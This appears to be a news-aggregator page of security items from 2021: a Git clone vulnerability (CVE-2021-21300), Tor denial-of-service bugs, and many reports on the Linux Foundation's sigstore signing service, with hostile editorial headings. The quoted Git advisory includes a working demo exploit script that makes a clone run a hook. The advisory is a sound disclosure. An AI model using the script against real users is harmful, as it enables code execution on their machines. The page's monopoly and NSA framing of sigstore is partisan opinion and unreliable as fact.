Language Selection

English French German Italian Portuguese Spanish

Security: Git, Tor, and Fake (Monopolised, Centralised) 'Security' From Linux Foundation

Filed under
Software
Security
  • "git clone" Hit By Vulnerability That Could Lead To Code Execution

    Disclosed today is CVE-2021-21300 as a security vulnerability affecting git clone that could lead to specially crafted repositories being able to execute code during the Git clone process.

    Git versions back to v2.15 are affected by this security vulnerability. Specially crafted repositories could execute code during the git clone process on case-insensitive file-systems supporting symbolic links. The vulnerability stems from clean/smudge filters being abused like those used by Git LFS.

  • The Tor Software Has Two Potential Denial Of Service Vulnerabilities, Fix Is Coming Next Week

    Current and previous versions for the Tor Onion Router software have two undisclosed Denial Of Service vulnerabilities with the potential to cause problems for the Tor networks authority servers. The Torproject will release a new version with a fix "early next week". Everyone who is using Tor Browser or running a Tor node should upgrade when it becomes available.

  • Linux Foundation Announces Free sigstore Signing Service to Confirm Origin and Authenticity of Software

    The Linux Foundation, the nonprofit organization enabling mass innovation through open source, today announced the sigstore project. sigstore improves the security of the software supply chain by enabling the easy adoption of cryptographic software signing backed by transparency log technologies.

    sigstore will empower software developers to securely sign software artifacts such as release files, container images and binaries. Signing materials are then stored in a tamper-proof public log. The service will be free to use for all developers and software providers, with the sigstore code and operation tooling developed by the sigstore community. Founding members include Red Hat, Google and Purdue University.

    “sigstore enables all open source communities to sign their software and combines provenance, integrity and discoverability to create a transparent and auditable software supply chain,” said Luke Hinds, Security Engineering Lead, Red Hat office of the CTO. “By hosting this collaboration at the Linux Foundation, we can accelerate our work in sigstore and support the ongoing adoption and impact of open source software and development.”

  • Industry-Wide Initiative to Support Open Source Security Gains New Commitments

    OpenSSF, a cross-industry collaboration to secure the open source ecosystem, today announced new membership commitments to advance open source security education and best practices. New members include Citi, Comcast, DevSamurai, Hewlett Packard Enterprise (HPE), Mirantis, and Snyk.

    Open source software (OSS) has become pervasive in data centers, consumer devices and services, representing its value among technologists and businesses alike. Because of its development process, open source has a chain of contributors and dependencies before it ultimately reaches its end users. It is important that those responsible for their user or organization’s security are able to understand and verify the security of this dependency supply chain.

'This vulnerability affects platforms with case-insensitive..."

  • git: malicious repositories can execute remote code while cloning
    Team,
    
    The Git project released new versions on Tuesday, March 9th 2021
    addressing CVE-2021-21300.
    
    This vulnerability affects platforms with case-insensitive filesystems
    with support for symbolic links, when certain clean/smudge filters are
    configured globally (e.g. Git LFS).
    
    The fixed versions are v2.17.6, v2.18.5, v2.19.6, v2.20.5, v2.21.4,
    v2.22.5, v2.23.4, v2.24.4, v2.25.5, v2.26.3, v2.27.1, v2.28.1, v2.29.3,
    and v2.30.2.
    
    Link to the announcement:
    https://lore.kernel.org/git/xmqqim6019yd.fsf@gitster.c.googlers.com/T/#u
    
    We highly recommend to upgrade.
    
    The addressed issue is:
    
    * CVE-2021-21300:
      On case-insensitive filesystems, with support for symbolic links,
      if Git is configured globally to apply delay-capable clean/smudge
      filters (such as Git LFS), Git could be fooled into running
      remote code during a clone.
    
      Demo exploit:
    
      #!/bin/sh
    
      git init delayed-checkout &&
      (
      	cd delayed-checkout &&
      	echo "A/post-checkout filter=lfs diff=lfs merge=lfs" \
      		>.gitattributes &&
      	mkdir A &&
      	printf '#!/bin/sh\n\necho PWNED >&2\n' >A/post-checkout &&
      	chmod +x A/post-checkout &&
      	>A/a &&
      	>A/b &&
      	git add -A &&
      	rm -rf A &&
      	ln -s .git/hooks a &&
      	git add a &&
      	git commit -m initial
      ) &&
      git clone delayed-checkout cloned
    
      With Git LFS enabled globally, this will print "PWNED" during the clone
      on case-insensitive file systems with support for symbolic links (such
      as NTFS, HFS+, etc).
    
    Credit for finding the vulnerability goes to Matheus Tavares who also
    worked with me on fixing it.
    
    Thanks,
    Johannes
    

Windows issue (mostly)

  • A Git security release

    Several new versions of the Git source-code management system have been released; they fix a vulnerability that could allow a hostile remote repository to execute code locally during a clone operation. Only users with case-insensitive filesystems are affected, reducing the set of possible targets considerably, but an update still seems like a good idea.

"Linux Foundation serves up free code-signing service"

  • Sign of the primes: Linux Foundation serves up free code-signing service • The Register

    The Linux Foundation, with the support of Google, Red Hat, and Purdue University, is launching a service called sigstore to help developers sign the code they release.

    Signing code involves associating a cryptographic signature with a specific digital artifact – release files, container images, and binaries – so that the person using the software can check the code's signature to verify that the release is authentic and hasn't been altered by someone along the way.

    "Sigstore enables all open source communities to sign their software and combines provenance, integrity and discoverability to create a transparent and auditable software supply chain," said Luke Hinds, security engineering lead in Red Hat's office of the CTO, in a statement.

  • Linux Foundation announces new open-source software signing service | ZDNet

    The just-announced sigstore aims to improve the security of the software supply chain by enabling the easy adoption of cryptographic software signing backed by transparency log technologies. It will do this by empowering developers to securely sign software artifacts such as release files, container images, and binaries. These signing records will then be kept in a tamper-proof public log. This service will be free for all developers and software providers to use. The sigstore code and operation tooling that will be used to make this work is still being developed by the sigstore community.

Monopolists trying to centralise application trust

  • Sigstore is a Let’s Encrypt Like Software Signing Service for Open Source Software

    It’s evident that security for anything is a top priority now. And, ensuring that the software you use is genuine and developed by the original developers is even more important.

    Of course, there will always be pirated or modded software available but even with that, if they utilize code signing, you will be able to verify the source (if you trust them in the first place).

    Even though software signing is important and has a ton of benefits to ensure the integrity of the software, code signing isn’t something adopted by many developers.

IBM and Google are centralising and monopolising trust

  • Linux Foundation Debuts Sigstore Project for Software Signing

    Sigstore aims to improve the open source software supply chain by simplifying the process of cryptographic software signing.

  • Linux Foundation Debuts Sigstore Project for Software Signing

    The Linux Foundation has announced the launch of Sigstore, a new nonprofit initiative that aims to improve open source software supply chain security by making it easier for developers to adopt cryptographic signing for different components of the software development process.

  • Linux Foundation Project Secures Software Supply Chains - DevOps.com

    The Linux Foundation today embraced a sigstore project founded by Red Hat, Google and Purdue University to make it simpler for developers to employ cryptographic software, enabled by transparency log technologies, to secure software supply chains.

  • Linux Foundation is making it easier to verify the authenticity of software

    In a bid to secure the open source software supply chain, the Linux Foundation, together with Red Hat, Google, and Purdue University have combined to launch a new project to help developers cryptographically sign their software.

    Considering the constant increase in the rate of industrial adoption of open source software, the project, called sigstore, aims to prevent an attack on a public software repository from injecting tainted code in the supply chain.

    “sigstore enables all open source communities to sign their software and combines provenance, integrity and discoverability to create a transparent and auditable software supply chain,” said Luke Hinds, Security Engineering Lead, Red Hat office of the CTO.

  • Linux Foundation launches free service to verify software authenticity

    The Linux Foundation, the non-profit organization enabling innovation through open source, has announced a new service to improve the security of the software supply chain by enabling the easy adoption of cryptographic software signing.

    Called 'sigstore' it will allow software developers to securely sign software artifacts such as release files, container images and binaries. Signing materials will then be stored in a tamper-proof public log. Founding members of the project include Red Hat, Google and Purdue University.

  • Linux Foundation launches software signing service

    The Linux Foundation is launching “sigstore,” a free-to-use software signing certificate authority open to all developers.

    Code signing cryptographically authenticates that software has not been tampered with before installation. It can be a valuable tool to prevent hackers from co-opting patching systems or software distribution to deliver malware.

    But it can be a difficult feature for open source software producers to leverage, given the complexities of the process and key management.

NSA-connected spy companies promise us "tamper-proof encryption"

  • The Linux Foundation's "sigstore" project

    The Linux Foundation has announced a project called sigstore; its purpose is to protect against supply-chain attacks by signing (and verifying) release artifacts. "Very few open source projects cryptographically sign software release artifacts. This is largely due to the challenges software maintainers face on key management, key compromise / revocation and the distribution of public keys and artifact digests. In turn, users are left to seek out which keys to trust and learn steps needed to validate signing. Further problems exist in how digests and public keys are distributed, often stored on websites susceptible to hacks or a README file situated on a public git repository. sigstore seeks to solve these issues by utilization of short lived ephemeral keys with a trust root leveraged from an open and auditable public transparency logs."

  • The Linux Foundation Launches sigstore, a New Software Signing Service

    The Linux Foundation is launching its new sigstore project to provide better security and protection for all aspects of the software supply chain. The new project will enable developers to sign specific aspects of their development process, ensuring that files and other assets carry strong, tamper-proof encryption.

Outsourcing Linux trust to monopolies with terrible record

  • Sigstore is a Linux Foundation project developed by Google and Red Hat for code signing

    An inherent weakness of open source code is that it's difficult to determine its provenance and how it was built, which means that it's prone to supply chain attacks. Google aims to solve this problem which is why it has collaborated with Red Hat and Smallstep to introduce Sigstore (stylized "sigstore") in the Linux Foundation, making it easier to digitally sign and verify source code.

    [...]

    As it currently stands, sigstore has a fully functioning transparency log, but the WebPKI and client signing tooling is still in prototyping stage and is not ready for general use. The tool is open source and free to use for all developers. The development teams thinks that there are no privacy concerns involved as sigstore does not need access to any personal information except the OpenID Connect grant which will contain the user's email address. Future plans for sigstore include introducing support for other OpenID Connect providers, updating the documentation, completing the development of the remaining signing infrastructure, and hardening the system for general use. You can find out more about the project on the dedicated website here.

Another puff piece

  • Google and Red Hat team up with Linux Foundation for software-signing service

    The Linux Foundation has launched a free-to-use service for open source developers to cryptographically sign software to reassure users further down the supply chain that the software they’re using is legitimate.

    Developed in partnership with Google and Red Hat, the sigstore project will allow the open source community to sign software artefacts including release files, container images and binaries before these elements are stored in a public log.

Trusting NSA enablers for supply chain checks

  • Linux Foundation boosts security with crypto signing and ID credentialing groups

    The Linux Foundation has launched a “sigstore” project for improving software security via crypto software signing and transparency logs. The LF also announced new members for OpenSSF and launched a “DizmeID Foundation” for digital ID credentialing.

    The Linux Foundation announced the launch of a sigstore project for cryptographic software signing and announced new members for its Open Source Security Foundation (OpenSSF). Other recent Linux Foundation security announcements include the launch of a DizmeID Foundation for digital ID credentialing and a new commitment from Google and the LF to prioritize funds to underwrite two full-time maintainers for Linux kernel security development (see farther below).

Microsoft boosters support centralisation and monopolisation...

Linux Foundation PR/media partner TechRepublic

  • A new Linux Foundation open source signing tool could make secure software supply chains universal [Ed: Linux Foundation PR/media partner TechRepublic the latest to promote fake security]

    Called sigstore, the new cryptographic signing platform uses public logging similar to (but not the same as) cryptocurrencies and other blockchain technologies, the end result of which eliminates many of the security risks associated with traditional digital signing technologies. As opposed to using actual blockchains, sigstore uses transparency logs, which it said are more resilient to majority attacks, avoid canonicalization and are more mature.

Sigstore Project Aims to Monopolise Software Supply Chain

More puff pieces

How Open Source is responding to IT's Pearl Harbor.

Free sigstore signing service confirms software origin....

  • Free sigstore signing service confirms software origin and authenticity

    sigstore will empower software developers to securely sign software artifacts such as release files, container images and binaries. Signing materials are then stored in a tamper-proof public log. The service will be free to use for all developers and software providers, with the sigstore code and operation tooling developed by the sigstore community. Founding members include Red Hat, Google and Purdue University.

    “sigstore enables all open source communities to sign their software and combines provenance, integrity and discoverability to create a transparent and auditable software supply chain,” said Luke Hinds, Security Engineering Lead, Red Hat office of the CTO. “By hosting this collaboration at the Linux Foundation, we can accelerate our work in sigstore and support the ongoing adoption and impact of open source software and development.”

Sigstore Is A New And Free Code Signing Service By Linux Fdn.

  • Sigstore Is A New And Free Code Signing Service By Linux Foundation

    The Sigstore project will enable developers to sign specific aspects of their development process. This will ensure that files and other assets carry strong, tamper-proof encryption.

    The Linux Foundation, today announced the sigstore project. Founding members include Red Hat, Google and Purdue University. Sigstore improves the security of the software supply chain. It enabling the easy adoption of cryptographic software signing backed by transparency log technologies.

    An inherent weakness of open source code is that it’s difficult to determine its provenance how it was built. That means that it’s prone to supply chain attacks.

Still shilling monopoly disguised as 'security'

  • Linux Foundation Sigstore Aims to Be the Let's Encrypt of Code Signing

    Backed by the Linux Foundation, Sigstore aims to provide a non-profit service to foster the adoption of cryptographic signing by open source projects to make the software supply chain more secure.

    The main issue Sigstore attempts to tackle is the difficulty of knowing the origin of a piece of software, or how it was built. This becomes especially tricky when that software is included in a larger project, paving the way to external attacks. As Google security engineers Kim Lewandowski and Dan Lorenc put it introducing the initiative,

Comment viewing options

Select your preferred way to display the comments and click "Save settings" to activate your changes.

More in Tux Machines

today's howtos

  • Comprehensive Guide to Using FFmpeg to Convert Media Files

    FFmpeg is one of those modern marvels of open source software. It is a suite of libraries and smaller programs to handle video and audio files primarily. It works with images and other multimedia files such as video streaming formats. It has lots of uses like video transcoding, video editing, video scaling, video cropping or other video manipulation work. At its heart FFmpeg is a command line tool used with the ffmpeg command. It has a basic simple video player and ability to probe video media information for analysis. FFmpeg is also included in the workflow of other software like the popular video player VLC. Enterprise companies like YouTube use it in their core processing when ingesting video uploads. Overall FFmpeg can play, record, convert, and stream audio and video. It includes libavcodec – the leading audio/video codec library. In this tutorial we’ll install FFmpeg and learn how to use some its most popular features through practical examples and detailed explanations.

  • Extracting substrings on Linux [Ed: This should say "GNU", not "Linux"]

    There are many ways to extract substrings from lines of text using Linux and doing so can be extremely useful when preparing scripts that may be used to process large amounts of data. This post describes ways you can take advantage of the commands that make extracting substrings easy.

  • How to Install WordPress with Apache and Let's Encrypt SSL on Ubuntu 22.04
  • How to install Godot Mono 3.4.4 on a Chromebook
  • How to install Steam Link on Debian 11 - Invidious

    In this video, we are looking at how to install Steam Link on Debian 11.

Hackers getting married

We had several of our old-time friends from the GNU Project, and some guests with young children still unused to such an international context who soon enough learned to enjoy the sound of different languages and the happy chaos of people meeting for the first time, some more traditional if not formal, others fun and weird. Read more

Fedora Releases and Red Hat/IBM Puff Pieces

  • Ben Williams: F36-20220516 updated Live isos released

    The Fedora Respins SIG is pleased to announce the latest release of Updated F36-20220516-Live ISOs, carrying the 5.17.6-300 kernel. This set of updated isos will save considerable amounts of updates after install. ((for new installs.)(New installs of Workstation have about 1GB of updates savings )).

  • Red Hat Enterprise Linux 8.6: Better security, more options

    Do you want a solid Linux distribution that also delivers the latest languages and solid security? Yes? Then consider getting Red Hat Enterprise Linux 8.6. Red Hat announced this new release at the Red Hat Summit. It has numerous new features, but the ones that caught my eye were the security improvements.

  • OS consistency solves Linux talent issues, says RHEL executive

    The new Red Hat Enterprise Linux, released during the recent Red Hat Summit, caters to rapidly escalating hardware development occurring throughout tech, along with a growing Linux admin skills shortage. RHEL 9 performs the combo double act, in part, by more efficiently optimizing the operating system, according to Gunnar Hellekson (pictured), general manager of the Enterprise Linux Business Unit at Red Hat Inc. Upgrading to the new OS means enterprises can get by with fewer admins. A skills shortage is caused, in part, by a lack of U.S. visas.

These two Linux desktops are the simplest picks for new users

Let's face it, any time you come across articles that offer advice on choosing the right Linux distribution, they tend to get bogged down in a lot of technical advice that rarely (if ever) applies to those who've never experienced Linux. They'll speak of things like rolling releases, package managers, kernels, open-source licensing, and other features and ideologies that not only have little bearing on those new to Linux and open-source technology but mire the decision in unnecessary complications. I want to take a very different approach, one that should make the process quite simple for anyone looking to dive into the world of desktop Linux for the first time. I'm going to shrug off the usual advice and aim straight for the heart of the matter. What exactly is that matter? Read more